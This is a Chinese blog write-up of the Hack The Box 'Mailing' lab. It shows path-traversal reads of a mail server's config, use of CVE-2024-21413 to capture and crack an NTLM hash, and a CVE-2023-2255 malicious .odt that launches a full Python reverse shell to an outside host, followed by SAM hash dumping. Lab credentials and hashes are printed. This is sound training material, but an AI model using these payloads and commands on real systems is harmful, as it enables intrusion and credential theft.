Hack The Box-Mailing

已于 2024-05-07 15:08:45 修改
阅读量2.5k 收藏 8
点赞数 33
分类专栏: HTB靶场合集 文章标签: 提权 hack the box windows libreoffice CVE LFI
于 2024-05-06 15:28:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52742680/article/details/138482768
版权

总体思路

任意文件读取->CVE-2024-21413->CVE-2023-2255

信息收集&端口利用

nmap -sSVC 10.129.57.185

在这里插入图片描述

目标开放25、80、110等端口,这里先将mailing.htb加入hosts文件后访问80端口

在这里插入图片描述

靶机是一个hMailServer框架为基础的网页,对其进行目录扫描

在这里插入图片描述

访问assets目录,是一个存放主页照片的文件夹

在这里插入图片描述

访问download.php,需要特定的参数

在这里插入图片描述

回到主页,发现下方有一个download按钮,能够看到参数为file,点击下载后将文件修改为win.ini查看能否访问

/download.php?file=../../../../../../../../../Windows/win.ini

在这里插入图片描述

尝试读取hosts文件

/download.php?file=../../../../../../../../../Windows/System32/Drivers/etc/hosts

在这里插入图片描述

都能够读取,存在任意文件读取漏洞

任意文件读取

在前面发现其使用的是hMailServer服务,可以使用任意文件读取读取其配置文件,但是首先需要知道他的文件路径

经过搜索可知,其配置文件和路径为hMailServer/Bin/hMailServer.INI,经过不断尝试后,得到了最终的路径:C:/Program Files (x86)/hMailServer/Bin/hMailServer.INI

在这里插入图片描述

在读取出来的文件中能看到administratorpassword为841bb5acfa6779ae432fd7a4e6600ba7,将其解密,解密后结果为homenetworkingadministrator

在这里插入图片描述

想到之前存在110端口的POP3服务

在这里插入图片描述

需要通过telnet服务来访问POP3

telnet 10.129.57.185 110
USER administrator@mailing.htb
PASS homenetworkingadministrator

在这里插入图片描述

但是邮箱中没有能够利用的邮件,但是既然有了邮件服务器的凭证,想到可以通过强制访问responder来获取NTLM,这里涉及到了CVE-2024-21413 Microsoft Outlook 远程代码执行漏洞,该漏洞脚本可以使用SMTP验证发送电子邮件,绕过 SPF、DKIM 和 DMARC检查,详见以下链接

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability?tab=readme-ov-file

CVE-2024-21413

先在本地启动responder服务

responder -I tun0 -v

运行CVE-2024-21413的POC(为什么是发送到maya用户暂时还未知)

python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\10.10.14.12\test' --subject Hi

能获取到maya用户的NTLM

在这里插入图片描述

maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000

使用hashcat的5600模式破解

在这里插入图片描述

得到了maya用户的登录凭证maya/m4y4ngs4ri,因为靶机开放了5985端口,使用evil-winrm登录

在这里插入图片描述

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

在这里插入图片描述

查看当前用户的权限

在这里插入图片描述

此处没有能够利用的点

在当前目录下有一个mail.py,查看他

在这里插入图片描述

查看端口开放情况

netstat -ano

在这里插入图片描述

都没有可以利用的点

最终经过寻找,在program files文件夹下找到了libreoffice组件,并且版本为7.4

在这里插入图片描述

搜索发现版本存在相关漏洞CVE-2023-2255,该POC能够创建一个指定命令的odt文件,只要该odt文件能够被运行,就能够做到命令执行

git clone https://github.com/elweth-sec/CVE-2023-2255

在C:下有一个important documents文件夹,注意到该文件夹中具有管理员权限运行

在这里插入图片描述

很有可能是将odt文件放入其中,然后获取管理员shell

CVE-2023-2255

一开始的思路为:上传一个msf的payload,然后通过odt文件去执行命令再调用payload,但是目标靶机上有AV,无法进行。于是转变思路,不使用exe获取shell,使用python获取shell

#shell.py
import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.12",9100))

p=subprocess.Popen(["cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()

先将shell.py上传到maya用户的桌面,然后执行CVE-2023-2255的POC

python3 CVE-2023-2255.py --cmd "python C:\Users\maya\Desktop\shell.py" --output 'exploit.odt'

这样当important documents中的odt文件被执行后,就会自动以管理员的身份反弹一个shell

在这里插入图片描述

等待片刻后,拿到管理员的shell

在这里插入图片描述

将maya用户加入到管理员组中

net localgroup Administradores maya /add

使用crackmapexec进行hashdump

crackmapexec smb 10.10.11.14 -u maya -p "m4y4ngs4ri" --sam

SMB         10.10.11.14    445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.10.11.14    445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.10.11.14    445    MAILING          [+] Dumping SAM hashes
SMB         10.10.11.14    445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.11.14    445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.10.11.14    445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.10.11.14    445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.10.11.14    445    MAILING          [+] Added 6 SAM hashes to the database

使用evil-winrm直接登录localadmin

在这里插入图片描述

Str4w_AShiR
关注
  • 33
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
htb_Mailing
weixin_62621015的博客
06-06 475
hack the box Windows
htb-Mailing
whale_waves的博客
05-23 1155
Microsoft Office Outlook是微软office的组件之一,也是常用的邮件客户端之一。CVE-2024-21413 是在 Microsoft Outlook 中发现的一个重大安全漏洞,CVSS 评分 9.8。攻击者将一个带恶意链接的邮件发送给被攻击用户,当用户点击链接时,会导致NTLM窃取与远程代码执行(RCE),并且该漏洞还能使攻击者能够绕过Office文档的受保护视图。本文先讲复现过程,后讲漏洞原理。
Mailing–HackTheBox-WP
sunquan705的博客
05-29 258
Mailing的wp,总体来说不难,主要是NTLM的获取,有很多种,不懂的可以评论出来。
Android-Mailing-Application-for-the-Visually-Impaired
04-01
视觉受损的Android邮寄应用程序 基于语音的电子邮件系统,不仅针对视觉障碍者,而且针对无法在日常生活中使用键盘的人们。 该应用程序可在装有Android 5.0 Lollipop和更高版本的设备上正常运行,尚未对旧版本进行...
Scalable-Mailing-sytem
05-05
可伸缩邮件系统 所有服务器的通用数据: 存在所有邮件数据的数据库。 2)一个整数,它指示服务器连接的整数数在EmailDAO类中 3)一个数组列表,该列表存储与覆盖的段相对应的整数,该列表在EmailDAO类中 ...
mass-mailing
03-21
群发邮件通过具有HTML正文文本支持的python发送大量电子邮件。 “ ms.py”文件存储... “ email.xlsx”存储电子邮件列表。 “ script.py”是主脚本。 “ config.py”是配置文件有关邮件取消订阅按钮的信息,请参见。
cloudcmd-mailing:Mailchimp 订阅 Cloud Commander
07-14
6. **版本控制**:文件名 `cloudcmd-mailing-master` 暗示了这个项目使用 Git 进行版本控制。开发者可能会使用 GitHub 或其他 Git 服务来托管代码,进行协同开发和发布新版本。 7. **打包与部署**:CloudCmd 扩展...
webtask-sendgrid-mailinglist-api:无服务器Sendgrid邮件列表API
05-16
Sendgrid邮件列表API 使用和快速部署无服务器的邮件列表订阅...wt create https://raw.githubusercontent.com/ndethore/webtask-sendgrid-mailinglist-api/app.js --name mailing-api --secret SENDGRID_API_KEY=<key>
Java小技能:多级组织机构排序并返回树结构(包含每个层级的子节点和业务数据集合)
iOS逆向与安全
07-17 1166
包含每个层级的子节点和业务数据集合。
Python 基础——元组
hpz3292887609的博客
07-16 358
3.元组类型定义时重要的是“ , ” ,创建和访问一个元组。+ : 拼接,左右的类型必须。and or 逻辑操作符。5.元组相关的操作符一致。#该代码会显示运行错误。4.更新和删除一个元组。
Qt创建列表,通过外部按钮控制列表的选中下移、上移以及左侧图标的显现
肩上风骋的博客
07-17 642
项目中需要使用列表QListWidget,但是不能直接拿来使用。需要创建一个列表,通过向上和向下的按钮来向上或者向下移动选中列表项,当当前项背选中再去点击确认按钮,会在列表项的前面出现一个图标。
Qt编写自定义控件:可交互的列表控件
友善啊,朋友的博客
07-19 210
【代码】Qt编写自定义控件:可交互的列表控件。
Python 基础——列表(list)
hpz3292887609的博客
07-16 406
通过元素的索引值(index)从列表获取单个元素(列表索引值是从0开始的)以逗号分隔的不同数据项使用方括号括起来,即可创建列表。index函数:返回参数在列表中的位置。若再次输入俩个元素,则出现以下错误。(以上都是将元素追加到列表的末尾)count函数:元素出现的次数。1.使用函数:append()2.使用函数:extend()3.使用函数:insert()仍然会出现错误,进行以下修改。reverse函数:反转列表。由此可得到列表的内置函数。2.交换列表中的元素。3.从列表中删除元素。函数remove()
Windows命令行(CMD)中,tasklist | findstr(搜索并显示包含特定字符串的进程信息)
小丁的博客
07-16 509
但是,请注意,PID是数值,而进程名称是文本字符串。如果你正在搜索PID,确保不要包含任何前缀或空格,因为。你也可以结合使用进程名称和PID的一部分来搜索,但这样做可能会返回不期望的结果,因为。命令时,你可以搜索并显示包含特定字符串的进程信息。注意这里没有引号包围PID,因为PID是数值,且。如果你想要找到所有属于特定用户的进程,你可以使用。更直接且可能更高效,特别是当处理大量进程时。命令的输出中PID前通常会有空格,但。命令用于显示当前运行的进程列表,而。命令的输出中PID前面通常会有空格。
java 生成树结构(可通过id、code)公共方法
_Mr丶s
07-16 261
【代码】java 生成树结构(可通过id、code)公共方法。
单链表算法 - 链表分割
黎相思的技术博客
07-16 260
现有一链表的头指针 ListNode* pHead,给一定值x,编写一段代码将所有小于x的。题目来自【牛客题霸】当我们提交代码之后代码有问题,那么代码到底哪里的逻辑不合适呢?链表分割_牛客题霸_牛客网。
Linux文件和目录常用命令
最新发布
loongnoy的博客
07-19 319
可以理解为现实生活中的管子,管子的一头塞东西进去,另一头取出来,这里 | 的左右分为俩端,左端塞东西(写),右端取东西(读)ls 是英文单词 list 的简写,其功能为列出目录的内容,是用户最常用的命令之一,类似于 DOs 下的dir 命令。-r 若给出的源文件是目录文件,则cp将递归复制该目录下的所有子目录和文件,目标文件必须为一个目录名。·cp 命令的功能是将给出的文件或目录复制到另一个文件或目录中,相当于DOS下的copy命令。的简写,其功能为更改当前的工作目录,也是用户最常用的命令之一。
使用映射算法将 ER 架构映射到关系数据库架构。使用以下表示法表示生成的关系数据库架构:PK 表示主键,AK 表示备用键,FK 表示外键,并带有指向相应表(主键)的箭头 Book Entity (Strong) - Title (single valued, simple string) - ISBN (single valued, simple alphanumeric string), pk - Edition (single valued, simple numeric) - Date of Publication (single valued, composite concatenation of characters and numbers) - Price (single valued, simple floating point number) - Book Description (single valued, simple string) Author Entity (Strong) - Author Name - Author_id, pk Publisher Entity (Strong) - Publisher id (single value, simple numeric), pk - Publisher Name (single valued, simple string) - Address (single valued, simple string) - together the publisher name and address could make an alternate key because no to publishers can have the same name and address Customer Entity (strong) - Customer_id (single valued, simple string), pk - Name (composite one value for first, middle and last name, simple string) - Mailing Address (single valued, simple string) - Credit Card Number and Expiration Date (single value, simple numeric sequence), alternate key - Phone Number (single value, simple alphanumeric string) - Email Address (single valued, simple alphanumeric string) Shipment (strong) - Date of Shipment ( single valued, composite of strings and numbers) - Tracking Number (single valued, simple alphanumeric string), pk - Date of Expected Delivery ( single valued, compoite of strings and numbers) Order (Strong) - Order Number (single valued, simple number), pk - Mailing Address (single value, simple string) - Method of Shipment (single value, simple string) - Date and Time of Order (when the order was placed) - Total Price of the Order (multivalue, composite) Promotion (strong entity type ) - Promotion id number, pk - Percentage Discount Points (single value, simple float) - Duration of Promotion (start date and end date) ( composite attributes like the dates above) Line Item(weak entity type) - Total price for each book that is ordered (single value, two place precision float) - Quantity of each item ordered Category (strong entity) - Category ID (single value, simple numeric), pk - Category Name (single value, simple string),
06-11
将ER架构映射到关系数据库架构,生成的关系数据库架构如下: Book 表: - ISBN (主键) - Title - Edition - Date of Publication - Price - Book Description Author 表: - Author_id (主键) - Author Name Publisher 表: - Publisher id (主键) - Publisher Name - Address - AK: Publisher Name + Address Customer 表: - Customer_id (主键) - Name - Mailing Address - Phone Number - Email Address - AK: Credit Card Number and Expiration Date Shipment 表: - Tracking Number (主键) - Date of Shipment - Date of Expected Delivery Order 表: - Order Number (主键) - Mailing Address - Method of Shipment - Date and Time of Order - Total Price of the Order Promotion 表: - Promotion id number (主键) - Percentage Discount Points - Duration of Promotion (start date and end date) Line Item 表: - Book ISBN (外键指向 Book 表) - Order Number (外键指向 Order 表) - Total price for each book that is ordered - Quantity of each item ordered Category 表: - Category ID (主键) - Category Name 需要注意的是,Line Item 表是一个弱实体类型,需要使用两个外键来指向 Book 表和 Order 表。另外,Promotion 表中的 Duration of Promotion 属性是一个复合属性,可以拆分成两个单独的属性来存储。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值